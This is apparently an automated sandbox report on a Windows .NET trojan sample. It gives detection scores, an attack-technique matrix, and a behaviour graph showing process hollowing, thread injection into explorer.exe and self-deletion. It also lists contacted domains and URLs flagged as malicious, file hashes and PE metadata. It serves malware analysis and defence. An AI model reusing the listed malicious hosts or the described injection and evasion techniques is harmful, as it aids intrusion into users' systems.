            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491384 Sample: z7d1ehQQQW.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 31 www.healthyweathorganics.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 8 other signatures 2->45 11 z7d1ehQQQW.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\z7d1ehQQQW.exe.log, ASCII 11->29 dropped 57 Tries to detect virtualization through RDTSC time measurements 11->57 59 Injects a PE file into a foreign processes 11->59 15 z7d1ehQQQW.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 33 www.noseainsight.com 18->33 35 www.dorotajedrusik.com 18->35 37 5 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 cscript.exe 18->22         started        signatures11 process12 signatures13 49 Self deletion via cmd delete 22->49 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            z7d1ehQQQW.exe25%VirustotalBrowse
            z7d1ehQQQW.exe13%ReversingLabsWin32.Trojan.Pwsx

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.z7d1ehQQQW.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            td-balancer-euw2-6-109.wixdns.net0%VirustotalBrowse
            noseainsight.com5%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.urwpp.deold0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.founder.com.cn/cn;0%Avira URL Cloudsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/-czt0%Avira URL Cloudsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cnp0%URL Reputationsafe
            http://www.noseainsight.com/cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47100%Avira URL Cloudmalware
            http://www.jiyu-kobo.co.jp/10%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/f0%Avira URL Cloudsafe
            www.odysseysailingsantorini.com/cmsr/0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/s-10%Avira URL Cloudsafe
            http://www.carterandcone.comw.c0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
            https://www.dorotajedrusik.com/cmsr?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR%2F3kPtojHfoDwxQoDiPWi0%2FzmWd0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.de0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.fontbureau.co0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/G0%URL Reputationsafe
            http://www.urwpp.deF0%URL Reputationsafe
            http://www.carterandcone.comn-uL0%Avira URL Cloudsafe
            http://www.tiro.comlic0%URL Reputationsafe
            http://www.carterandcone.comCe0%Avira URL Cloudsafe
            http://www.carterandcone.comt0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.dorotajedrusik.com/cmsr/?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR/3kPtojHfoDwxQoDiPWi0/zmWdCsSN34zRZDM7Yr&jtxXAR=f6Ad0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.monotype.0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/i0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/f0%URL Reputationsafe
            http://www.tiro.com0K0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            td-balancer-euw2-6-109.wixdns.net
            		35.246.6.109
            		truefalseunknown
            noseainsight.com
            		34.102.136.180
            		truefalseunknown
            www.healthyweathorganics.com
            		47.91.170.222
            		truetrue
              		unknown
              www.dorotajedrusik.com
              		unknown
              		unknowntrue
                		unknown
                www.noseainsight.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.noseainsight.com/cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47false
                  • Avira URL Cloud: malware
                  		unknown
                  www.odysseysailingsantorini.com/cmsr/true
                  • Avira URL Cloud: safe
                  		low
                  http://www.dorotajedrusik.com/cmsr/?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR/3kPtojHfoDwxQoDiPWi0/zmWdCsSN34zRZDM7Yr&jtxXAR=f6Adfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.urwpp.deoldz7d1ehQQQW.exe, 00000000.00000003.657716958.0000000005AFE000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fontbureau.com/designersGz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designers/?z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bThez7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersWz7d1ehQQQW.exe, 00000000.00000003.659553696.0000000005B00000.00000004.00000001.sdmpfalse
                          		high
                          http://www.tiro.comz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cn;z7d1ehQQQW.exe, 00000000.00000003.654997513.0000000005AFE000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.com/designersz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.664218437.0000000005B00000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.658968542.0000000005AFF000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.657880283.0000000005AFE000.00000004.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/Oz7d1ehQQQW.exe, 00000000.00000003.657716958.0000000005AFE000.00000004.00000001.sdmpfalse
                              		high
                              http://www.goodfont.co.krz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comz7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designerses-es_tradnl;z7d1ehQQQW.exe, 00000000.00000003.657817317.0000000005AFE000.00000004.00000001.sdmpfalse
                                		high
                                http://www.jiyu-kobo.co.jp/-cztz7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sajatypeworks.comz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netDz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cn/cThez7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.661245659.0000000005B00000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnpz7d1ehQQQW.exe, 00000000.00000003.654997513.0000000005AFE000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/1z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/jp/fz7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/s-1z7d1ehQQQW.exe, 00000000.00000003.655831522.0000000005AD4000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-user.htmlOz7d1ehQQQW.exe, 00000000.00000003.658881250.0000000005AFF000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designersdz7d1ehQQQW.exe, 00000000.00000003.657764912.0000000005AFE000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.carterandcone.comw.cz7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.galapagosdesign.com/DPleasez7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.ascendercorp.com/typedesigners.htmlz7d1ehQQQW.exe, 00000000.00000003.656320601.0000000005AFE000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.dorotajedrusik.com/cmsr?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR%2F3kPtojHfoDwxQoDiPWi0%2FzmWdcscript.exe, 00000009.00000002.918829235.00000000052AF000.00000004.00020000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fonts.comz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.deDPleasez7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.urwpp.dez7d1ehQQQW.exe, 00000000.00000003.660250458.0000000005B00000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.zhongyicts.com.cnz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sakkal.comz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.656667821.0000000005AFE000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designersnz7d1ehQQQW.exe, 00000000.00000003.660082867.0000000005B00000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designers2Iz7d1ehQQQW.exe, 00000000.00000003.660117823.0000000005B00000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.apache.org/licenses/LICENSE-2.0z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.comz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.coz7d1ehQQQW.exe, 00000000.00000003.659128745.0000000005AFF000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/Gz7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.urwpp.deFz7d1ehQQQW.exe, 00000000.00000003.657537776.0000000005AFE000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.carterandcone.comn-uLz7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.tiro.comlicz7d1ehQQQW.exe, 00000000.00000003.655730815.0000000005B00000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.carterandcone.comCez7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.carterandcone.comtz7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/jp/z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.carterandcone.comlz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cnz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/frere-user.htmlz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.658933536.0000000005AFF000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designers/cabarga.htmlz7d1ehQQQW.exe, 00000000.00000003.659434113.0000000005B00000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.monotype.z7d1ehQQQW.exe, 00000000.00000003.657056723.0000000005AFE000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.655831522.0000000005AD4000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/iz7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers8z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.658933536.0000000005AFF000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designersMF5z7d1ehQQQW.exe, 00000000.00000003.657764912.0000000005AFE000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.jiyu-kobo.co.jp/fz7d1ehQQQW.exe, 00000000.00000003.655831522.0000000005AD4000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.tiro.com0Kz7d1ehQQQW.exe, 00000000.00000003.655730815.0000000005B00000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers/z7d1ehQQQW.exe, 00000000.00000003.657716958.0000000005AFE000.00000004.00000001.sdmpfalse
                                                          		high

                                                          Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          35.246.6.109
                                                          		td-balancer-euw2-6-109.wixdns.netUnited States
                                                          		15169GOOGLEUSfalse
                                                          34.102.136.180
                                                          		noseainsight.comUnited States
                                                          		15169GOOGLEUSfalse

                                                          General Information

                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                          Analysis ID:491384
                                                          Start date:27.09.2021
                                                          Start time:14:35:54
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 12m 14s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:z7d1ehQQQW.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:20
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@7/1@3/2
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 47.4% (good quality ratio 42.1%)
                                                          • Quality average: 73.3%
                                                          • Quality standard deviation: 32.4%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 65
                                                          • Number of non-executed functions: 106
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .exe
                                                          Warnings:
                                                          Show All
                                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                          • Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.82.209.104, 20.54.110.249, 23.0.174.185, 23.0.174.200, 40.112.88.60, 23.10.249.26, 23.10.249.43, 20.50.102.62
                                                          • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, download.windowsupdate.com.edgesuite.net, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          14:36:54API Interceptor2x Sleep call for process: z7d1ehQQQW.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASN

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z7d1ehQQQW.exe.log
                                                          Process:C:\Users\user\Desktop\z7d1ehQQQW.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.355304211458859
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                          Malicious:true
                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.6030295284828995
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Windows Screen Saver (13104/52) 0.07%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:z7d1ehQQQW.exe
                                                          File size:685568
                                                          MD5:50568fb6133ee4ed721ee46a3c0a9e98
                                                          SHA1:4897b6f2141395071652f72d34dc3d39eb014a56
                                                          SHA256:2b1a98add215568bb5e1c333321cf0ffe98d9128fa149c4f5a07ce2922750b3e
                                                          SHA512:d5facfcf30e3e9f815f595c3af6992551d623a5592c13e7ae8df4e29e7f6401523339bf5a7835d46c80b998fdc3338530ea677f85a08c4fe16829a83879f529f
                                                          SSDEEP:12288:+11lXTqv/Q7zgVAhTQ4HzW0Ikfda+pv0va7bjndt:qDbsVdu5ID+90vMbjd
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0..j............... ........@.. ....................................@................................

                                                          File Icon

                                                          Icon Hash:00828e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4a88ee
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x61518DCF [Mon Sep 27 09:24:31 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:v4.0.30319
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [ecx], al
                                                          add al, byte ptr [ebx]
                                                          add al, 05h
                                                          push es
                                                          pop es
                                                          or byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

